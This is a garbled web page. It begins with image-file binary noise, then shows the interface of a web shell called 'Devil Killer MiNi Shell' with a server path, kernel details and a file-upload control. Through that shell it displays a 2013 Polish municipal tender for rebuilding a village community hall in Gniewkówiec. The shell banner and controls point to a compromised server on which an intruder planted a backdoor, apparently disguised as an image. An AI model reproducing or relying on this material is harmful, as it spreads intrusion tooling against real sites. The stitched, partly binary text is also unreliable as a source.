JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130520/81975-N-2013.html

<p class="kh_header"><b>Złotniki Kujawskie: Budowa świetlicy wiejskiej w Gniewkówcu</b><br>
<b>Numer ogłoszenia: 81975 - 2013; data zamieszczenia: 20.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złotniki Kujawskie , ul. Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie, woj. kujawsko-pomorskie, tel. 52 35 17 160, faks 52 35 17 160 wew. 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotnikikuj.ires.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej w Gniewkówcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres zamówienia obejmuje:  
 
   Rozbiórkę obiektu starej świetlicy wiejskiej i budowę budynku świetlicy  w miejscowości  
   Gniewkówiec.
   
1)Rozbiórce podlega budynek parterowy z dachem płaskim bez podpiwniczenia przylegający   
   poprzez łącznik  do istniejącego budynku dwukondygnacyjnego  szkoły.
   Konstrukcję dachu stanowią dźwigary kratowe stalowe w rozstawie około 1,50 m.Dźwigary  
   rozpiętości  około 10,0 m ułożone w kierunku poprzecznym opierają się na ścianach 
   zewnętrznych podłużnych. Pas górny zrobiony z 2 kątowników 45x45x4, pas dolny z  
   dwóch kątowników 60x60x6.Pręty skratowania  z profili pełnych okrągłych O 16 mm (stal 
   zbrojeniowa Stos). 
   Sufit podwieszony do dźwigarów z płyty pilśniowej grubości 1,00 cm, mocowanych do łat z 
   podwójnie ułożonych desek o wymiarach 20x150 mm, w rozstawie  co około 0,50 m, 
   stropodach nieocieplony.
   Ściany nadziemia murowane z pustaków  gr. 24,0 cm,   
   obustronnie tynkowane tynkiem cementowo-wapiennym, ściany fundamentowe z 
   gruzobetonu, posadowione w poziomie 0,80 m poniżej  terenu. Posadzka wyniesiona 0,70  
   m ponad poziom terenu.
   Wymiary budynku w rzucie 9,80 x 14,00 m; powierzchnia zabudowy 137,20 m2 , wysokość   
   ok. 5,0 m.
   Zakres rozbiórki obejmuje całkowitą likwidację istniejącego obiektu starej świetlicy wraz z  
    fundamentami.

  2)Przedmiotem inwestycji jest budowa budynku świetlicy na działkach nr 281/15,
     280, 279, 281/18 w miejscowości Gniewkówiec, gmina Złotniki Kujawskie.
     Sposób zabudowy - dobudowa do istniejącego obiektu szkoły.

2.0. Dane o obiekcie
Obiekt jest bryłą zwartą, na bazie trzech prostokątów (A-wejście, B-sala główna,
C-sanitariaty i pomieszczenia gospodarcze).
2.1. Wymiary gabarytowe brył:
A I. długość: 6,70 m   II. szerokość 3,54 m
B I. długość: 15,20 m II. szerokość 9,54 m
C I. długość: 6,56 m   II. szerokość 11,20 m
2.2. Liczba kondygnacji nadziemnych: jedna
2.3. Powierzchnia zabudowy: 242,20 m2
2.4. Powierzchnia netto kondygnacji: 210,32 m2
2.5. Wysokość obiektu: 6,46m
2.6. Kubatura brutto: 1.152,36 m3
2.7.Rodzaj ogrzewania: centralne z kotłowni obiektu szkoły
2.8.Dach dwuspadowy o kącie nachylenia poszczególnych brył - A-20 stopni, B-19 stopni, C-  
      19 stopni. Na pokrycie należy zastosować blachodachówkę gr. 0,5mm w kolorze grafit   
       mat. Obiekt wyposażony w otwory okienne i drzwiowe.
2.9. Dane dotyczące konstrukcji.
3.0. Rodzaj konstrukcji: konstrukcja murowa w technologii tradycyjnej. Ściana o przekroju :
       bloczki z betonu komórkowego murowane na zaprawie cementowowapiennej, warstwa 
      docieplenia ze styropianu gr. 15cm.
3.1. Układ ścian nośnych: mieszany.
3.2. Fundamenty posadowione na głębokości 135cm - 170cm poniżej poziomu terenu. Ławy   
       fundamentowe o wymiarach 80x40cm i 60x40cm z betonu C16/20 (B20) zbrojone stalą 
       AIII i AI według rysunku konstrukcyjnego ław fundamentowych.
       Pod częścią istniejącą zaplecza szkoły obowiązkowo wykonać podlanie ścian istniejących   
       zewnętrznych nośnych. Podlanie wykonać metodą poszerzenia bez zazębienia według    
      projektu ław fundamentowych. Kolejność prac wykonać ściśle według technologii  
      podanej w projekcie ław. Do podlania ścian użyć betonu C16/20,stal AI i AIII.
3.3. Ściany
Ściany fundamentowe poniżej poziomu terenu.
Ściany fundamentowe grubości 24cm wykonać z bloczków betonowych klasy B-20 w następujących warstwach licząc od strony wewnętrznej obiektu :
- izolacja 2 x przeciwwilgociowa powłokowa
- bloczki betonowe klasy B-20 grubości 24cm
- izolacja 2 x przeciwwilgociowa powłokowa
- styropian grubości 10cm
- siatka z warstwą klejową
- izolacja 2 x przeciwwilgociowa powłokowa

Ściany fundamentowe powyżej poziomu terenu.
Ściany fundamentowe grubości 24cm wykonać z bloczków betonowych klasy B-20 w następujących warstwach licząc od strony wewnętrznej obiektu :
- izolacja 2 x przeciwwilgociowa powłokowa
- bloczki betonowe klasy B-20 grubości 24cm
- izolacja 2 x przeciwwilgociowa powłokowa
- styropian grubości 10cm
- siatka z warstwą klejową
- tynk cienkowarstwowy tzw. kamyczek gr. 1,50mm akrylowy według kolorów podanych na kolorystyce elewacji 
Ściany:
Zewnętrzne przyziemia wykonać w następującym układzie warstw licząc od strony wewnętrznej obiektu:
- farba emulsyjna wewnętrzna w kolorach pastelowych
- gładź gipsowa
- tynk cementowo - wapienny wewnętrzny
- gazobeton odmiany 700 gr. 24cm zaprawie cementowo-wapienny
- styropian fasadowy gr. 15cm
- tynk cienkowarstwowy tzw. kamyczek gr. 1,50mm akrylowy według kolorów podanych  
   na kolorystyce elewacji
Wewnętrzne nośne: o następującym układzie warstw:
- farba emulsyjna wewnętrzna w kolorach pastelowych
- gładź gipsowa
- tynk wewnętrzny cementowo - wapienny
- bloczek gazobetonowy gr. 24cm
- tynk wewnętrzny cementowo - wapienny
- gładź gipsowa
- farba emulsyjna wewnętrzna w kolorach pastelowych
Wewnętrzne działowe: o następującym układzie warstw:
- farba emulsyjna wewnętrzna w kolorach pastelowych
- gładź gipsowa
- tynk wewnętrzny cementowo - wapienny
- bloczek gazobetonowy gr. 6cm lub 12cm
- tynk wewnętrzny cementowo - wapienny
- gładź gipsowa
- farba emulsyjna wewnętrzna w kolorach pastelowych
3.4. Konstrukcja dachu:
Główną konstrukcję dachu projektowanego obiektu stanowią dwa dźwigary drewniane z drewna klasy C-30 o rozpiętościach 9,00m i 10,66m w osiach. Nad częścią wejściową konstrukcja dachu jętkowa z drewna klasy C-24. Wymiary i lokalizację elementów z drewna pokazano na rysunku szczegółowych konstrukcji dachu. Więźbę dachu wykonać ściśle według projektu konstrukcyjnego zawartego w części rysunkowej opracowania.
Wszystkie elementy drewniane dwukrotnie zaimpregnować preparatem pleśnio i
grzybobójczym oraz preparatem ognioochronnym do stopnia nie rozprzestrzeniania ognia.
Projektowany układ warstw budynku przy konstrukcji dachu opartej na dźwigarze. Warstwy wykonać w następującym układzie licząc od strony zewnętrznej obiektu:
- blachodachówka w kolorze grafit mat
- łaty drewniane 5x6cm dostosowane do rozstawy fali blachodachówki
- kontrłaty drewniane 2,5x5cm
- papa podkładowa na welonie z włókna szklanego 
- pełne deskowanie z desek gr. 3,2cm
- przestrzeń powietrzna
- dźwigar drewniany wraz z stężeniami
- wełna mineralna gr. 35cm w dwóch warstwach w pasie dolnym dźwigara
- folia paroizolacyjna
- podwójne płyty g-k ognio i wodoodporne gr. 2x12,5mm podwieszone na
podwójnym stelażu metalowym
Projektowany układ warstw przy konstrukcji dachu opartej na konstrukcji
jętkowej. Warstwy wykonać w następującym układzie licząc od strony zewnętrznej obiektu:
- blachodachówka w kolorze grafit mat 
- łaty drewniane 4x6cm dostosowane do rozstawy fali blachodachówki
- kontrłaty drewniane 2,5x5cm
- papa podkładowa na welonie z włókna szklanego 
- pełne deskowanie z desek gr. 3,2cm
- krokwie 8x16cm
- wełna mineralna gr. 35cm w dwóch warstwach między krokwiami
- folia paroizolacyjna
- okładzina z płyt gk
3.5.Izolacje przeciwwilgociowe i przeciwwodne w budynku
3.5.1. Izolacja
ławy fundamentowe:
- pozioma ław 2xpapa asfaltowa na lepiku
ściany fundamentowe:
- pionowa ścian fundamentowych - 2xwarstwa przeciwwilgociowa powłokowa
  parter:
- pozioma posadzki - izolacja przeciwwilgociowa 1x folia PE
- pionowa ścian - 2x przeciwwilgociowa 
3.5.2. Izolacja dachu:
- papa podkładowa pod blachodachówką
3.6. Izolacje termiczne i dźwiękochłonne w budynku:
3.6.1. Izolacja cieplna ścian zewnętrznych:
- ściany parteru - styropian elewacyjny gr. 15cm
- ściany fundamentowe - styropian elewacyjny gr. 10cm
3.6.2. Izolacja cieplna stropów, dachu:
- podłoga na gruncie - styropian posadzkowy gr. 9cm
- dach - wełna mineralna gr. 35cm w dwóch warstwach naprzemiennie
3.7. Wykończenie wewnętrzne w budynku:
3.7.1. Tynki wewnętrzne:
- wewnętrzne ścian - cementowo-wapienne
- sufit parteru wykonać z płyt gipsowo-kartonowych
3.7.2. Podłogi i posadzki:
Układ warstw w podłodze podano na rysunku przekroju.
3.8. Stolarka okienna i drzwiowa:
Stolarka okienna i drzwiowa:
- okienna zewnętrzna PCV w kolorze białym
- stolarka drzwiowa wewnętrzna - częściowo aluminium zimne w kolorze białym, częściowo stolarka płytowa
- stolarka drzwiowa zewnętrzna - aluminium ciepłe w kolorze białym
- w pomieszczeniu szatni i sali od strony północno-wschodniej otwory w ścianach zewnętrznych wypełnić pustakami szklanymi bezbarwnymi.
Przed zamówieniem stolarki wykonać pomiary według rzeczywistego stanu otworów.
Wszystkie okna wyposażyć obowiązkowo w nawiewniki higrosterowane.
Stolarkę okienną i drzwiową wykonać ściśle według rysunku zestawienia stolarki.
3.9. Ślusarka:
Balustrady schodów zewnętrznych wykonać z rur stalowych O 50 mm
pochwyt, słupki malowanych farbą podkładową i zewnętrzną w kolorze grafit,
wypełnienie - pręty okrągłe gładkie średnicy 10mm malowane w sposób
analogiczny.
3.10. Malowanie i wykończenie ścian:
Malowanie lub inne wykończenie sufitów : pomieszczenia pomalować po
uprzednim zagruntowaniu unigruntem farbami emulsyjnymi w kolorze białym -
sufity, ściany - w kolorach pastelowych, powierzchnie drewniane pomalowane
lakierem chemoutwardzalnym 
W pomieszczeniach mokrych łazienki, wc płytki na ścianach do wysokości
205cm, powyżej malowane farbami emulsyjnymi w kolorach pastelowych.
3.11. Wykończenie zewnętrzne budynku:
3.11.1. Tynki zewnętrzne ścian przyziemia i cokołu: akrylowy tzw. kamyczek gr.1,50mm metoda lekka-mokra w kolorach zgodnie z rysunkiem elewacji.
3.11.2. Pokrycie dachu: blachodachówka gr. 0,5mm w kolorze grafit mat .
3.12. Kominy: wentylacyjne z rur obudowanych według rysunku detali
kominów wentylacyjnych. Ponad dachem wykończone jak ściany zewnętrzne.
3.13. Schody zewnętrzne: betonowe wylewane na gruncie z betonu klasy C12/15 w
następującym rozmiarze stopni i podstopni - 3x15x35cm; wykończenie schodów -
płytki gress antypoślizgowe, mrozoodporne w kolorze grafitowym.
4. ELEMENTY WYPOSAŻENIA TECHNICZNEGO
Instalacje w budynku należy wykonać zgodnie z wytycznymi zawartymi w projektach
branżowych.
4.1. Kanalizacja: odprowadzanie ścieków - projektowane przyłącze kanalizacyjne
4.2. Instalacja wody zimnej: z projektowanego przyłącza wodociągowego, ciepła
woda użytkowa - elektryczny podgrzewacz wody
4.3. Instalacja grzewcza: centralne ogrzewanie z budynku szkoły
4.4. Wentylacja: w budynku zaprojektowano wentylację mechaniczną i grawitacyjną.

5.Ponadto w ramach zamówienia należy wykonać:
5.1.utwardzenie nawierzchni zagospodarowania terenu - wykonać dojścia, chodniki  
      z kostki betonowej gr. 6 cm oraz utwardzenie pod wewnętrzną drogę dojazdową, parking  
      z kostki betonowe gr. 8 cm,
5.2.Instalacja centralnego ogrzewania i wentylacji - projektowany budynek będzie ogrzewany  
      z istniejącej kotłowni znajdującej się w istniejącym budynku. Zasilanie przewodami 
      preizolowanymi prowadzonymi poza budynkiem.

5.3.Przyłącza zewnętrzne:
5.3.1. Przyłącze wodociągowe
5.3.2. Przyłącze kanalizacji sanitarnej
5.3.3. Przyłącze kanalizacji deszczowej
5.3.4. Przyłącze c.o.

5.4. instalacje wewnętrzne wod-kan:
5.4.1.Instalacja wewnętrzna wody zimnej i ciepłej
5.4.2.Kanalizacja sanitarna wewnętrzna

5.5.Instalacje elektryczne: 
5.5.1 Instalacja oświetlenia wewnętrznego
5.5.2.Instalacja gniazd 230 V
5.5.3.Instalacja gniazd 400 V
5.5.4.instalacja oświetlenia zewnętrznego
5.5.5.Instalacja odgromowa

6.0. Obsługa geodezyjna  z inwentaryzacją powykonawczą.
                                                                                         
Szczegółowy zakres zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, wymagania zawarte w siwz, natomiast przedmiar robót jest  elementem pomocniczym.
Przedmiary robót stanowią dokumenty pomocnicze do wyceny zadania..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących  
     nie więcej niż 10% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.22.32.00-8, 45.22.33.00-9, 45.22.35.00-1, 45.22.38.00-4, 45.21.50.00-7, 45.21.00.00-2, 45.45.00.00-6, 45.33.20.00-3, 45.33.10.00-6, 45.33.00.00-9, 45.30.00.00-0, 45.31.10.00-0, 45.31.23.10-3, 45.31.61.00-6, 45.31.73.00-5, 45.31.60.00-5, 45.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 15.000,00 zł
słownie: piętnaście tysięcy złotych
Wykonawca ubiegający  się o udzielenie zamówienia zobowiązany jest do wniesienia 
 wadium przed upływem terminu składania ofert tj. do dnia 03.06.2013 r. do godz.11:00.
Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od  
 wyboru Wykonawcy: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
    ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju        
    Przedsiębiorczości Dz. U. Nr 109, poz. 1158  z późn. zm.
Wadium wnoszone w pieniądzu musi być wpłacone przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy Bydgoszcz Oddział  Złotniki Kujawskie konto  depozytowe  Nr 32 81 42 10 59 0000 19  35 2000 0004  z dopiskiem Przetarg na budowę 
świetlicy   wiejskiej w Gniewkówcu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełnienie  
    wykonawca  zobowiązany jest udokumentować</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże wykonanie, w okresie ostatnich  
         pięciu  lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności  
         jest krótszy - w  tym okresie należyte wykonanie:
         co najmniej dwóch robót polegających na budowie i/lub przebudowie budynku o wartości   
         co najmniej 500.000,00 zł każda,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony  jeżeli Wykonawca wykaże dysponowanie osobami (min 1 osobą w każdej specjalności), zdolnymi do wykonania zamówienia, które będą uczestniczyć w jego wykonaniu,   w szczególności osobami posiadającymi , uprawnienia budowlane do pełnienia funkcji:
   1) kierownika budowy w specjalności  konstrukcyjno - budowlanej bez ograniczeń,
   2) kierownika robót sanitarnych w specjalności  instalacyjnej w zakresie sieci, instalacji i 
       urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,
3)	kierownika robót elektrycznych w specjalności instalacyjnej w zakresie sieci, instalacji i 
     urządzeń elektrycznych i elektroenergetycznych, ze wskazaniem zakresu wykonywanych przez nie czynności oraz informacją o podstawie do  dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna posiadanie:
a) Informacji banku lub kasy oszczędnościowo-kredytowej, potwierdzającej  wysokość posiadanych środków finansowych  lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż  500.000,00 zł. 
b) opłaconej  polisy a w przypadku jej braku  innego dokumentu potwierdzającego ,że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00   PLN na czas wykonania zamówienia .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

